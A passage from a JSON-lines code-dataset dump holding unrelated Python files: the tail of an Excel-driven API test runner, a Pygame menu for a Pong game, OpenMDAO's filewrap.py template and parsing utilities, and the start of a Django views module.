i] = \"Pass\"\n sheet[\"M%d\" % i] = response.content.decode(\"utf-8\")\n logging.info(case + \" \" + sheet[\"A%d\" % i].value + response.content.decode(\"utf-8\"))\n else:\n sheet[\"L%d\" % i] = \"Fail\"\n sheet[\"M%d\" % i] = response.content.decode(\"utf-8\")\n logging.error(\n case + \" \" + sheet[\"A%d\" % i].value + response.content.decode(\"utf-8\"))\n else:\n sheet[\"L%d\" % i] = \"Fail\"\n sheet[\"M%d\" % i] = response.content.decode(\"utf-8\")\n logging.error(case + \" \" + sheet[\"A%d\" % i].value + response.content.decode(\"utf-8\"))\n\n i += 1\n except Exception as e:\n logging.error(case + \" \" + sheet[\"A%d\" % i].value + \"Error: \" + str(e))\n i += 1\n continue\n\n sheet[\"M2\"].value = checked_version\n logging.info(\"The new version is updated. 
\")\n logging.info(\"the %s test is completed. \" % case)\n logging.info(\"------------------------------------------------------------------------------------\\n\\n\")\n # 每个版本的测试数据追加到最后一行,功能尚未完成\n # history_data_append(wb)\n wb.save(\"./testcase/\" + case)\n # 要求测试用例文档格式为XXX项目接口(或API)测试用例.xlsx\n # wb.save(\"./report/%s测试报告%s.html\" % (case[:-10], date.today()))\n # subprocess.call(\"cp /opt/auto_run/testcase/%s /home/xjin/.jenkins/workspace/API_Test/\" % case,\n # shell=True)\n with open(\"./report/%s测试报告%s.html\" % (case[:-10], date.today()), 'w') as html_file:\n html_file.write(to_html.HTML_TMPL)\n html_file.flush()\n html_file.close()\n else:\n logging.info(\"%s No new version found. \" % case)\n logging.info(\"------------------------------------------------------------------------------------\\n\\n\")\n except Exception as e:\n raise e\n\n\nif __name__ == '__main__':\n api_test()\n # history_data_append()\n # check_version(response=requests.get(\"http://10.215.137.232:8001/main/api/backend/version/\"))\n","sub_path":"api_test.py","file_name":"api_test.py","file_ext":"py","file_size_in_byte":7155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"599677598","text":"from math import *\r\nfrom pygame import *\r\nfrom Classique import *\r\nimport pygame\r\n\r\n#Background - Load - Initialisation des fonds.\r\n\r\ninit()\r\n\r\nfenetre = display.set_mode((800, 600), RESIZABLE)\r\n\r\nfondBlack = image.load(\"fonds/fondblack.jpg\").convert_alpha()\r\nfondMenu = image.load(\"fonds/fondmenu.jpg\").convert_alpha()\r\nfondModes = image.load(\"fonds/fondmodes.jpg\").convert_alpha()\r\n\r\n#Global Functions - Fonctions globales.\r\n\r\ndef clearAll():\r\n\t\"\"\"\r\n\tFonctions de déboggage, permet d'afficher un écran noir, utile pour savoir si il y a eu réponse ou non.\r\n\tDebugging function, displays a black screen. Can be used to detect user interaction in debug mode.\r\n\t\"\"\"\r\n\tfenetre.blit(fondBlack, (0,0))\r\n\tdisplay.flip()\r\n\r\n#States - États.\r\n\r\nstate = \"menu\"\r\nstateOverride = \"debug\" #Seulement à des fins de déboggage. 
Only for debugging purposes.\r\n\r\n\"\"\" \r\nAll different states - Tous les états différents :\r\n- \"menu\"\r\n- \"modes\"\r\n- \"informations\"\r\n- \"classique\"\r\n- \"pouvoirs\"\r\n- stateOverride ----> \"debug\".\r\n\"\"\"\r\nclass volume:\r\n\r\n\tdef displayFunc():\r\n\t\t\"\"\"\r\n\t\tAffiche et lance les fonctions liées le bouton mute du jeu.\r\n\t\tLoads and displays functions linked to the mute button.\r\n\t\t\"\"\"\r\n\t\t#Display - Affichage\r\n\r\n\t\tvolumeRect = image.load(\"mute.png\").convert_alpha()\r\n\t\tfenetre.blit(volumeRect, (0, 0))\r\n\tdef musicFunc():\r\n\t\t\"\"\"\r\n\t\tActive ou désactive toutes les fonctions liées au volume et aux sons du jeu.\r\n\t\tMute on or off.\r\n\t\t\"\"\"\r\n\t\tmusique_theme = pygame.mixer.music.load(\"musique.mp3\")\r\n\t\tpygame.mixer.music.play(-1)\r\n\r\n\tdef clickFunc():\r\n\t\t\"\"\"\r\n\t\tJoue le son lors d'un click.\r\n\t\tPlays a sound effect when object is clicked.\r\n\t\t\"\"\"\r\n\t\tclick_sound_effect = pygame.mixer.music.load(\"click.mp3\")\r\n\t\tpygame.mixer.music.play(0)\r\n\r\n\r\ndef menuFunc():\r\n\t\"\"\"\r\n\tLance l'apparation et les fonctions globales du Menu.\r\n\tRun dislay and load mouse events.\r\n\t\"\"\"\r\n\t#Display - Affichage.\r\n\tfenetre.blit(fondMenu, (0,0))\r\n\r\n\tpresentationRect = image.load(\"menu/presentation.jpg\").convert_alpha()\r\n\tfenetre.blit(presentationRect, (200, 250))\r\n\tmodesRect = image.load(\"menu/modes.jpg\").convert_alpha()\r\n\tfenetre.blit(modesRect, (300, 50))\r\n\tinformationsRect = image.load(\"menu/informations.jpg\").convert_alpha()\r\n\tfenetre.blit(informationsRect, (300, 450))\r\n\r\n\t#User mouse events - Utilisation de la souris par l'utilisateur. -- onClickEvent.\r\n\tmouseCordsX, mouseCordsY = mouse.get_pos()\r\n\tif mouse.get_pressed()[0]:\r\n\t\tif 300 <= mouseCordsX <= 500:\r\n\t\t\tif 450 <= mouseCordsY <= 550:\r\n\t\t\t\tvolume.clickFunc()\r\n\t\t\t\tprint(\"Click informations | ! |\")\r\n\t\t\t\tstateTransfer = \"informations\"\r\n\t\t\t\treturn stateTransfer\r\n\t\t\telif 50 <= mouseCordsY <= 150:\r\n\t\t\t\tvolume.clickFunc()\r\n\t\t\t\tprint(\"Click modes | ! |\")\r\n\t\t\t\tstateTransfer = \"modes\"\r\n\t\t\t\treturn stateTransfer\r\n\r\n\tdisplay.flip()\r\n\r\ndef modesFunc():\r\n\t\"\"\"\r\n\tLance l'apparition et les fonctions du menu de sélection des modes.\r\n\tRun display and load mouse events of the Modes menu.\r\n\t\"\"\"\r\n\t#Display - Affichage\r\n\tfenetre.blit(fondModes, (0,0))\r\n\r\n\ttitleRect = image.load(\"modes/titre.jpg\").convert_alpha()\r\n\tfenetre.blit(titleRect, (250, 20))\r\n\tclassiqueRect = image.load(\"modes/classique.jpg\").convert_alpha()\r\n\tfenetre.blit(classiqueRect, (250, 150))\r\n\tpouvoirsRect = image.load(\"modes/pouvoirs.jpg\").convert_alpha()\r\n\tfenetre.blit(pouvoirsRect, (345, 300))\r\n\tretourRect = image.load(\"modes/retour.jpg\").convert_alpha()\r\n\tfenetre.blit(retourRect, (250, 450))\r\n\r\n\t#User mouse events - Utilisation de la souris par l'utilisateur. -- onClickEvent.\r\n\tmouseCordsX, mouseCordsY = mouse.get_pos()\r\n\tif mouse.get_pressed()[0]:\r\n\t\tif 345 <= mouseCordsX <= 545:\r\n\t\t\tif 300 <= mouseCordsY <= 400:\r\n\t\t\t\tvolume.clickFunc()\r\n\t\t\t\tprint(\"Click pouvoirs | ! |\")\r\n\t\t\t\tstateTransfer = \"debug\"\r\n\t\tif 250 <= mouseCordsX <= 450:\r\n\t\t\tif 150 <= mouseCordsY <= 250:\r\n\t\t\t\tvolume.clickFunc()\r\n\t\t\t\tprint(\"Click classique | ! 
|\")\r\n\t\t\t\tstateTransfer = \"classique\"\r\n\t\t\t\treturn stateTransfer\r\n\t\t\telif 450 <= mouseCordsY <= 550:\r\n\t\t\t\tvolume.clickFunc()\r\n\t\t\t\tprint(\"Click retour | ! |\")\r\n\t\t\t\tstateTransfer = \"retour\"\r\n\t\t\t\treturn stateTransfer\r\n\r\n\tdisplay.flip()\r\n\r\ndef nbplayersFunc():\r\n\t\"\"\"\r\n\tLance l'apparition et les fonctions de la page de choix de joueurs.\r\n\tRun display and loads functions related to the players number.\r\n\t\"\"\"\r\n\t#Display - Affichage\r\n\tfenetre.blit(fondModes, (0,0))\r\n\r\n\tuniqueRect = image.load(\"players/unique.jpg\").convert_alpha()\r\n\tfenetre.blit(uniqueRect, (270, 45))\r\n\tduoRect = image.load(\"players/duo.jpg\").convert_alpha()\r\n\tfenetre.blit(duoRect, (385, 250))\r\n\tretourRect = image.load(\"modes/retour.jpg\").convert_alpha()\r\n\tfenetre.blit(retourRect, (250, 450))\r\n\r\n\t#User mouse events - Utilisation de la souris par l'utilisateur. -- onClickEvent.\r\n\tmouseCordsX, mouseCordsY = mouse.get_pos()\r\n\tif mouse.get_pressed()[0]:\r\n\t\tif 270 <= mouseCordsX <= 470:\r\n\t\t\tif 45 <= mouseCordsY <= 145:\r\n\t\t\t\tvolume.clickFunc()\r\n\t\t\t\tprint(\"Click unique | ! |\")\r\n\t\t\t\tstateTransfer = \"unique\"\r\n\t\t\t\treturn stateTransfer\r\n\t\tif 385 <= mouseCordsX <= 585:\r\n\t\t\tif 250 <= mouseCordsY <= 350:\r\n\t\t\t\tvolume.clickFunc()\r\n\t\t\t\tprint(\"Click duo | ! |\")\r\n\t\t\t\tstateOverride = \"duo\"\r\n\t\t\t\treturn stateOverride\r\n\t\tif 250 <= mouseCordsX <= 450:\r\n\t\t\tif 450 <= mouseCordsY <= 550:\r\n\t\t\t\tvolume.clickFunc()\r\n\t\t\t\tprint(\"Click retour | ! |\")\r\n\t\t\t\tstateTransfer = \"retour\"\r\n\t\t\t\treturn stateTransfer\r\n\t\r\n\tdisplay.flip()\r\n\r\ndef informationsFunc():\r\n\t\"\"\"\r\n\tLance l'apparition et les fonctions de la page informations.\r\n\tRun display and loads informations's mouse events.\r\n\t\"\"\" \r\n\t#Display - Affichage\r\n\tfenetre.blit(fondBlack, (0,0))\r\n\r\n\tpresentationRect = image.load(\"informations/texte.jpg\").convert_alpha()\r\n\tfenetre.blit(presentationRect,(0,0))\r\n\ttitleRect = image.load(\"informations/titre.jpg\").convert_alpha()\r\n\tfenetre.blit(titleRect, (250,25))\r\n\tretourRect = image.load(\"informations/retour.jpg\").convert_alpha()\r\n\tfenetre.blit(retourRect, (570, 475))\r\n\r\n\t#User mouse events - Utilisation de la souris par l'utilisateur. -- onClickEvent.\r\n\tmouseCordsX, mouseCordsY = mouse.get_pos()\r\n\tif mouse.get_pressed()[0]:\r\n\t\tif 570 < mouseCordsX < 770:\r\n\t\t\tif 475 < mouseCordsY < 575:\r\n\t\t\t\tvolume.clickFunc()\r\n\t\t\t\tprint(\"Click Retour | ! |\")\r\n\t\t\t\tstateTransfer = \"retour\"\r\n\t\t\t\treturn stateTransfer\r\n\r\n\tdisplay.flip()\r\n\r\n#Principal Loop - Boucle Principale.\r\n\r\nrunning = True\r\nmusique = True\r\n\r\nwhile running:\r\n\tfor event in pygame.event.get():\r\n\t\tif event.type == pygame.QUIT:\r\n\t\t\trunning = False\r\n\t\t\tprint(\"Merci d'avoir jouer ! Voici une blague : Que dit Higgs lors d'un concert ? 
Quel Boson !\")\r\n\t\t\tquit()\r\n\t\t\texit()\r\n\r\n\t\tif state == \"menu\":\r\n\t\t\tmenuFunc()\r\n\t\t\tif menuFunc() == \"modes\":\r\n\t\t\t\tstate = \"modes\"\r\n\t\t\tif menuFunc() == \"informations\":\r\n\t\t\t\tstate = \"informations\"\r\n\r\n\t\tif state == \"modes\":\r\n\t\t\tmodesFunc()\r\n\t\t\tif modesFunc() == \"classique\":\r\n\t\t\t\tstate = \"classique\"\r\n\t\t\t\tif state == \"classique\":\r\n\t\t\t\t\tstate = \"players\"\r\n\t\t\telif modesFunc() == \"pouvoirs\":\r\n\t\t\t\tstate = \"pouvoirs\"\r\n\t\t\t\tif state == \"pouvoirs\":\r\n\t\t\t\t\tstate == \"players\"\r\n\t\t\telif modesFunc() == \"retour\":\r\n\t\t\t\tstate = \"retour\"\r\n\t\t\t\tif state == \"retour\":\r\n\t\t\t\t\tstate = \"menu\"\r\n\r\n\t\tif state == \"informations\":\r\n\t\t\tinformationsFunc()\r\n\t\t\tif informationsFunc() == \"retour\":\r\n\t\t\t\tstate = \"retour\"\r\n\t\t\t\tif state == \"retour\":\r\n\t\t\t\t\tstate = \"menu\"\r\n\r\n\t\tif state == \"players\":\r\n\t\t\tnbplayersFunc()\r\n\t\t\tif nbplayersFunc() == \"unique\":\r\n\t\t\t\tstate = \"start_unique\"\r\n\t\t\t\tif state == \"start_unique\":\r\n\t\t\t\t\tunique()\r\n\t\t\tif nbplayersFunc() == \"duo\":\r\n\t\t\t\tstate = \"start_duo\"\r\n\t\t\t\tif state == \"start_duo\":\r\n\t\t\t\t\tduo()\r\n\t\t\telif nbplayersFunc() == \"retour\":\r\n\t\t\t\tstate = \"menu\"","sub_path":"Pong/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":7517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"523195190","text":"\"\"\"\nA collection of utilities for file wrapping.\n\nNote: This is a work in progress.\n\"\"\"\n\nimport re\nfrom pyparsing import CaselessLiteral, Combine, OneOrMore, Optional, \\\n TokenConverter, Word, nums, oneOf, printables, \\\n ParserElement\n\n# pylint: disable-msg=E0611,F0401\nfrom numpy import append, array, zeros\n\ndef _getformat(val):\n # Returns the output format for a floating point number.\n # The general format is used with 16 places of accuracy, except for when\n # the floating point value is an integer, in which case a decimal point\n # followed by a single zero is used.\n \n if int(val) == val:\n return \"%.1f\"\n else:\n return \"%.16g\"\n\n\nclass _SubHelper(object):\n \"\"\"Replaces file text at the correct word location in a line. 
This\n class contains the Helper Function that is passed to re.sub, etc.\"\"\"\n \n def __init__(self):\n \n self.newtext = \"\"\n self.replace_location = 0\n self.current_location = 0\n self.counter = 0\n self.start_location = 0\n self.end_location = 0\n \n def set(self, newtext, location):\n \"\"\"Sets a new word location and value for replacement.\"\"\"\n \n self.newtext = newtext\n self.replace_location = location\n self.current_location = 0\n \n def set_array(self, newtext, start_location, end_location):\n \"\"\"For an array, sets a new starting location, ending location, and\n value for replacement.\"\"\"\n \n self.newtext = newtext\n self.start_location = start_location\n self.end_location = end_location\n self.current_location = 0\n \n def replace(self, text):\n \"\"\"This function should be passed to re.sub.\n Outputs newtext if current_location = replace_location\n Otherwise, outputs the input text.\"\"\"\n \n self.current_location += 1\n \n if self.current_location == self.replace_location:\n if isinstance(self.newtext, float):\n return _getformat(self.newtext) % self.newtext\n else:\n return str(self.newtext)\n else:\n return text.group()\n \n def replace_array(self, text):\n \"\"\"This function should be passed to re.sub.\n Outputs newtext if current_location = replace_location\n Otherwise, outputs the input text.\"\"\"\n \n self.current_location += 1\n end = len(self.newtext)\n \n if self.current_location >= self.start_location and \\\n self.current_location <= self.end_location and \\\n self.counter < end:\n if isinstance(self.newtext[self.counter], float):\n val = self.newtext[self.counter]\n newval = _getformat(val) % val\n else:\n newval = str(self.newtext[self.counter])\n self.counter += 1\n return newval\n else:\n return text.group()\n\n\nclass ToInteger(TokenConverter):\n \"\"\"Converter for PyParsing that is used to turn a token into an int.\"\"\"\n def postParse( self, instring, loc, tokenlist ):\n \"\"\"Converter to make token into an integer.\"\"\"\n return int(tokenlist[0])\n\nclass ToFloat(TokenConverter):\n \"\"\"Converter for PyParsing that is used to turn a token into a float.\"\"\"\n def postParse( self, instring, loc, tokenlist ):\n \"\"\"Converter to make token into a float.\"\"\"\n return float(tokenlist[0].replace('D', 'E'))\n\nclass ToNan(TokenConverter):\n \"\"\"Converter for PyParsing that is used to turn a token into Python nan.\"\"\"\n def postParse( self, instring, loc, tokenlist ):\n \"\"\"Converter to make token into Python nan.\"\"\"\n return float('nan')\n \nclass ToInf(TokenConverter):\n \"\"\"Converter for PyParsing that is used to turn a token into Python inf.\"\"\"\n def postParse( self, instring, loc, tokenlist ):\n \"\"\"Converter to make token into Python inf.\"\"\"\n return float('inf')\n \n \ndef _parse_line():\n \"\"\"Parse a single data line that may contain string or numerical data.\n Float and Int 'words' are converted to their appropriate type. 
\n Exponentiation is supported, as are NaN and Inf.\"\"\"\n \n digits = Word(nums)\n dot = \".\"\n sign = oneOf(\"+ -\")\n ee = CaselessLiteral('E') | CaselessLiteral('D')\n\n num_int = ToInteger(Combine( Optional(sign) + digits ))\n \n num_float = ToFloat(Combine( Optional(sign) + \n ((digits + dot + Optional(digits)) |\n (dot + digits)) +\n Optional(ee + Optional(sign) + digits)\n ))\n \n # special case for a float written like \"3e5\"\n mixed_exp = ToFloat(Combine( digits + ee + Optional(sign) + digits ))\n \n nan = ToInf(oneOf(\"Inf -Inf\")) | \\\n ToNan(oneOf(\"NaN nan NaN% NaNQ NaNS qNaN sNaN \" + \\\n \"1.#SNAN 1.#QNAN -1.#IND\"))\n \n # sep = Literal(\" \") | Literal(\"\\n\")\n \n data = ( OneOrMore( (nan | num_float | mixed_exp | num_int |\n Word(printables)) ) )\n \n return data\n\n\nclass InputFileGenerator(object):\n \"\"\"Utility to generate an input file from a template.\n Substitution of values is supported. Data is located with\n a simple API.\"\"\"\n \n def __init__(self):\n \n self.template_filename = []\n self.output_filename = []\n \n self.delimiter = \" \"\n self.reg = re.compile('[^ \\n]+')\n \n self.data = []\n self.current_row = 0\n self.anchored = False\n \n def set_template_file(self, filename):\n \"\"\"Set the name of the template file to be used The template\n file is also read into memory when this method is called.\n \n filename: str\n Name of the template file to be used.\"\"\"\n \n self.template_filename = filename\n \n templatefile = open(filename, 'r')\n self.data = templatefile.readlines()\n templatefile.close()\n\n def set_generated_file(self, filename):\n \"\"\"Set the name of the file that will be generated.\n \n filename: str\n Name of the input file to be generated.\"\"\"\n \n self.output_filename = filename\n\n def set_delimiters(self, delimiter):\n \"\"\"Lets you change the delimiter that is used to identify field\n boundaries.\n \n delimiter: str\n A string containing characters to be used as delimiters.\"\"\"\n \n self.delimiter = delimiter\n self.reg = re.compile('[^' + delimiter + '\\n]+')\n \n def mark_anchor(self, anchor, occurrence=1):\n \"\"\"Marks the location of a landmark, which lets you describe data by\n relative position. Note that a forward search begins at the old anchor \n location. If you want to restart the search for the anchor at the file\n beginning, then call ``reset_anchor()`` before ``mark_anchor``. \n \n anchor: str\n The text you want to search for.\n \n occurrence: integer\n Find nth instance of text; default is 1 (first). Use -1 to\n find last occurrence. 
Reverse searches always start at the end\n of the file no matter the state of any previous anchor.\"\"\"\n \n if not isinstance(occurrence, int):\n raise ValueError(\"The value for occurrence must be an integer\")\n \n instance = 0\n if occurrence > 0:\n count = 0\n for line in self.data[self.current_row:]:\n \n # If we are marking a new anchor from an existing anchor, and\n # the anchor is mid-line, then we still search the line, but\n # only after the anchor.\n if count == 0 and self.anchored:\n line = line.split(anchor)[-1]\n\n if line.find(anchor) > -1:\n \n instance += 1\n if instance == occurrence:\n self.current_row += count\n self.anchored = True\n return\n \n count += 1\n \n elif occurrence < 0:\n count = len(self.data)-1\n for line in reversed(self.data):\n \n # If we are marking a new anchor from an existing anchor, and\n # the anchor is mid-line, then we still search the line, but\n # only before the anchor.\n if count == len(self.data)-1 and self.anchored:\n line = line.split(anchor)[0]\n\n if line.find(anchor) > -1:\n instance += -1\n if instance == occurrence:\n self.current_row = count\n self.anchored = True\n return\n \n count -= 1\n else:\n raise ValueError(\"0 is not valid for an anchor occurrence.\")\n \n raise RuntimeError(\"Could not find pattern %s in template file %s\" % \\\n (anchor, self.template_filename))\n \n def reset_anchor(self):\n \"\"\"Resets anchor to the beginning of the file.\"\"\"\n \n self.current_row = 0\n self.anchored = False\n \n def transfer_var(self, value, row, field):\n \"\"\"Changes a single variable in the template relative to the \n current anchor.\n \n row - number of lines offset from anchor line (0 is anchor line).\n This can be negative.\n \n field - which word in line to replace, as denoted by delimiter(s)\"\"\"\n\n j = self.current_row + row\n line = self.data[j]\n \n sub = _SubHelper()\n sub.set(value, field)\n newline = re.sub(self.reg, sub.replace, line)\n \n self.data[j] = newline\n \n def transfer_array(self, value, row_start, field_start, field_end,\n row_end=None, sep=\", \"):\n \"\"\"Changes the values of an array in the template relative to the \n current anchor. This should generally be used for one-dimensional\n or free form arrays.\n \n value: float, integer, bool, str\n array of values to insert.\n \n row_start: integer\n starting row for inserting the array. This is relative\n to the anchor, and can be negative.\n \n field_start: integer\n starting field in the given row_start as denoted by \n delimiter(s). \n \n field_end: integer\n the final field the array uses in row_end. 
\n We need this to figure out if the template is too small or large\n \n row_end: integer (optional)\n Use if the array wraps to cover additional lines.\n \n sep: integer (optional)\n Separator to use if we go beyond the template.\"\"\"\n \n # Simplified input for single-line arrays\n if row_end == None:\n row_end = row_start\n \n sub = _SubHelper()\n for row in range(row_start, row_end+1):\n \n j = self.current_row + row\n line = self.data[j]\n\n if row == row_end:\n f_end = field_end\n else:\n f_end = 99999\n sub.set_array(value, field_start, f_end)\n field_start = 0\n \n newline = re.sub(self.reg, sub.replace_array, line)\n self.data[j] = newline\n \n # Sometimes an array is too large for the example in the template\n # This is resolved by adding more fields at the end\n if sub.counter < len(value):\n for val in value[sub.counter:]:\n newline = newline.rstrip() + sep + str(val)\n \n self.data[j] = newline\n \n # Sometimes an array is too small for the template\n # This is resolved by removing fields\n elif sub.counter > len(value):\n \n # TODO - Figure out how to handle this.\n # Ideally, we'd remove the extra field placeholders\n raise ValueError(\"Array is too small for the template.\")\n \n self.data[j] += \"\\n\"\n \n def transfer_2Darray(self, value, row_start, row_end, field_start,\n field_end, sep=\", \"):\n \"\"\"Changes the values of a 2D array in the template relative to the \n current anchor. This method is specialized for 2D arrays, where each\n row of the array is on its own line.\n \n value: ndarray\n array of values to insert.\n \n row_start: integer\n Starting row for inserting the array. This is relative\n to the anchor, and can be negative.\n \n row_end: integer\n Final row for the array, relative to the anchor.\n \n field_start: integer\n starting field in the given row_start as denoted by \n delimiter(s). \n \n field_end: integer\n the final field the array uses in row_end. 
\n We need this to figure out if the template is too small or large\n \n sep: str (optional) (currently unsupported)\n Separator to append between values if we go beyond the template\"\"\"\n\n sub = _SubHelper()\n i = 0\n for row in range(row_start, row_end+1):\n \n j = self.current_row + row\n line = self.data[j]\n\n sub.set_array(value[i, :], field_start, field_end)\n \n newline = re.sub(self.reg, sub.replace_array, line)\n self.data[j] = newline\n \n sub.current_location = 0\n sub.counter = 0\n i += 1\n \n # TODO - Note, we currently can't handle going beyond the end of\n # the template line\n\n def clearline(self, row):\n \"\"\"Replace the contents of a row with the newline character.\n \n row: integer\n row number to clear, relative to current anchor.\"\"\"\n\n self.data[self.current_row + row] = \"\\n\"\n \n def generate(self):\n \"\"\"Use the template file to generate the input file.\"\"\"\n\n infile = open(self.output_filename, 'w')\n infile.writelines(self.data)\n infile.close()\n\n\nclass FileParser(object):\n \"\"\"Utility to locate and read data from a file.\"\"\"\n \n def __init__(self, end_of_line_comment_char=None, full_line_comment_char=None):\n \n self.filename = []\n self.data = []\n \n self.delimiter = \" \\t\"\n self.end_of_line_comment_char = end_of_line_comment_char\n self.full_line_comment_char = full_line_comment_char\n \n self.current_row = 0\n self.anchored = False\n \n def set_file(self, filename):\n \"\"\"Set the name of the file that will be generated.\n \n filename: str\n Name of the input file to be generated.\"\"\"\n \n self.filename = filename\n \n inputfile = open(filename, 'r')\n if not self.end_of_line_comment_char and not self.full_line_comment_char:\n self.data = inputfile.readlines()\n else:\n self.data = []\n for line in inputfile :\n if line[0] == self.full_line_comment_char : continue\n self.data.append( line.split( self.end_of_line_comment_char )[0] )\n inputfile.close()\n\n def set_delimiters(self, delimiter):\n \"\"\"Lets you change the delimiter that is used to identify field\n boundaries.\n \n delimiter: str\n A string containing characters to be used as delimiters. The\n default value is ' \\t'. which means that spaces and tabs are not\n taken as data but instead mark the boundaries. Note that the\n parser is smart enough to recognize characters within quotes as\n non-delimiters.\"\"\"\n \n self.delimiter = delimiter\n if delimiter != \"columns\":\n ParserElement.setDefaultWhitespaceChars(str(delimiter))\n \n def mark_anchor(self, anchor, occurrence=1):\n \"\"\"Marks the location of a landmark, which lets you describe data by\n relative position. Note that a forward search begins at the old anchor \n location. If you want to restart the search for the anchor at the file\n beginning, then call ``reset_anchor()`` before ``mark_anchor``. \n \n anchor: str\n The text you want to search for.\n \n occurrence: integer\n find nth instance of text; default is 1 (first). Use -1 to\n find last occurrence. 
Reverse searches always start at the end\n of the file no matter the state of any previous anchor.\"\"\"\n \n if not isinstance(occurrence, int):\n raise ValueError(\"The value for occurrence must be an integer\")\n \n instance = 0\n if occurrence > 0:\n count = 0\n for line in self.data[self.current_row:]:\n \n # If we are marking a new anchor from an existing anchor, and\n # the anchor is mid-line, then we still search the line, but\n # only after the anchor.\n if count == 0 and self.anchored:\n line = line.split(anchor)[-1]\n\n if line.find(anchor) > -1:\n \n instance += 1\n if instance == occurrence:\n self.current_row += count\n self.anchored = True\n return\n \n count += 1\n \n elif occurrence < 0:\n count = len(self.data)-1\n for line in reversed(self.data):\n \n # If we are marking a new anchor from an existing anchor, and\n # the anchor is mid-line, then we still search the line, but\n # only before the anchor.\n if count == len(self.data)-1 and self.anchored:\n line = line.split(anchor)[0]\n\n if line.find(anchor) > -1:\n instance += -1\n if instance == occurrence:\n self.current_row = count\n self.anchored = True\n return\n \n count -= 1\n else:\n raise ValueError(\"0 is not valid for an anchor occurrence.\")\n \n raise RuntimeError(\"Could not find pattern %s in output file %s\" % \\\n (anchor, self.filename))\n \n def reset_anchor(self):\n \"\"\"Resets anchor to the beginning of the file.\"\"\"\n \n self.current_row = 0\n self.anchored = False\n \n def transfer_line(self, row):\n \"\"\"Returns a whole line, relative to current anchor.\n \n row: integer\n number of lines offset from anchor line (0 is anchor line).\n This can be negative.\"\"\"\n \n return self.data[self.current_row + row].rstrip()\n \n def transfer_var(self, row, field, fieldend=None):\n \"\"\"Grabs a single variable relative to the current anchor.\n \n --- If the delimiter is a set of chars (e.g., \", \") ---\n \n row: integer\n number of lines offset from anchor line (0 is anchor line).\n This can be negative.\n \n field: integer\n which word in line to retrieve.\n \n fieldend - IGNORED\n \n --- If the delimiter is \"columns\" ---\n \n row: integer\n number of lines offset from anchor line (0 is anchor line).\n This can be negative.\n \n field: integer\n character position to start\n \n fieldend: integer (optional)\n position of last character to return. If omitted, the end of\n the line is used\"\"\"\n \n j = self.current_row + row\n line = self.data[j]\n \n if self.delimiter == \"columns\":\n \n if not fieldend:\n line = line[(field-1):]\n else:\n line = line[(field-1):(fieldend)]\n \n # Let pyparsing figure out if this is a number, and return it\n # as a float or int as appropriate\n data = _parse_line().parseString(line)\n \n # data might have been split if it contains whitespace. If so,\n # just return the whole string\n if len(data) > 1:\n return line\n else:\n return data[0]\n else:\n data = _parse_line().parseString(line)\n return data[field-1]\n\n def transfer_keyvar(self, key, field, occurrence=1, rowoffset=0):\n \"\"\"Searches for a key relative to the current anchor and then grabs\n a field from that line.\n \n field: integer\n Which field to transfer. Field 0 is the key.\n \n occurrence: integer\n find nth instance of text; default is 1 (first value\n field). Use -1 to find last occurance. Position 0 is the key\n field, so it should not be used as a value for occurrence.\n \n rowoffset: integer (optional)\n Optional row offset from the occurrence of key. 
This can\n also be negative.\n \n You can do the same thing with a call to ``mark_anchor`` and ``transfer_var``.\n This function just combines them for convenience.\"\"\"\n\n if not isinstance(occurrence, int) or occurrence==0:\n msg = \"The value for occurrence must be a nonzero integer\"\n raise ValueError(msg)\n \n instance = 0\n if occurrence > 0:\n row = 0\n for line in self.data[self.current_row:]:\n if line.find(key) > -1:\n instance += 1\n if instance == occurrence:\n break\n \n row += 1\n \n elif occurrence < 0:\n row = -1\n for line in reversed(self.data[self.current_row:]):\n if line.find(key) > -1:\n instance += -1\n if instance == occurrence:\n break\n \n row -= 1\n \n j = self.current_row + row + rowoffset\n line = self.data[j]\n \n fields = _parse_line().parseString(line.replace(key,\"Key_Field\"))\n \n return fields[field]\n\n def transfer_array(self, rowstart, fieldstart, rowend=None, fieldend=None):\n \"\"\"Grabs an array of variables relative to the current anchor.\n \n rowstart: integer\n Row number to start, relative to the current anchor\n \n fieldstart: integer\n field number to start\n \n rowend: integer (optional)\n row number to end. If not set, then only one row is grabbed.\n \n Setting the delimiter to 'columns' elicits some special behavior\n from this method. Normally, the extraction process wraps around\n at the end of a line and continues grabbing each field at the start of\n a newline. When the delimiter is set to columns, the paramters\n (rowstart, fieldstart, rowend, fieldend) demark a box, and all\n values in that box are retrieved. Note that standard whitespace\n is the secondary delimiter in this case.\n \"\"\"\n \n j1 = self.current_row + rowstart\n \n if rowend is None:\n j2 = j1 + 1\n else:\n j2 = self.current_row + rowend + 1\n \n if not fieldend:\n raise ValueError(\"fieldend is missing, currently required\")\n \n lines = self.data[j1:j2]\n\n data = zeros(shape=(0, 0))\n\n for i, line in enumerate(lines):\n if self.delimiter == \"columns\":\n line = line[(fieldstart-1):fieldend]\n \n # Stripping whitespace may be controversial.\n line = line.strip()\n \n # Let pyparsing figure out if this is a number, and return it\n # as a float or int as appropriate\n parsed = _parse_line().parseString(line)\n \n newdata = array(parsed[:])\n # data might have been split if it contains whitespace. 
If the\n # data is string, we probably didn't want this.\n if '|S' in str(newdata.dtype):\n newdata = array(line)\n \n data = append(data, newdata)\n \n else:\n parsed = _parse_line().parseString(line)\n if i == j2-j1-1:\n data = append(data, array(parsed[(fieldstart-1):fieldend]))\n else:\n data = append(data, array(parsed[(fieldstart-1):]))\n fieldstart = 1\n \n return data\n \n \n","sub_path":"openmdao.util/src/openmdao/util/filewrap.py","file_name":"filewrap.py","file_ext":"py","file_size_in_byte":25195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"40223931","text":"from django.core import serializers\nfrom django.core.paginator import Paginator\nfrom django.shortcuts import get_object_or_404, render\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom coookit.models import (Documents,\n Comments)\nfrom coookit.forms import UserCommentsForm\n\n\ndef _topics_with_documents():\n return Documents.objects.visible().order_by('topic').values_list('topic', flat=True).distinct()\n\n\ndef home(request):\n docs_on_page = 8\n init_page_num = 1\n\n section = request.GET.get('section')\n page_number = request.GET.get('page', init_page_num)\n topics = _topics_with_documents()\n\n aggr = {}\n documents = Documents.objects.visible().order_by('topic')\n for one_doc in documents:\n aggr.setdefault(one_doc.topic, [])\n 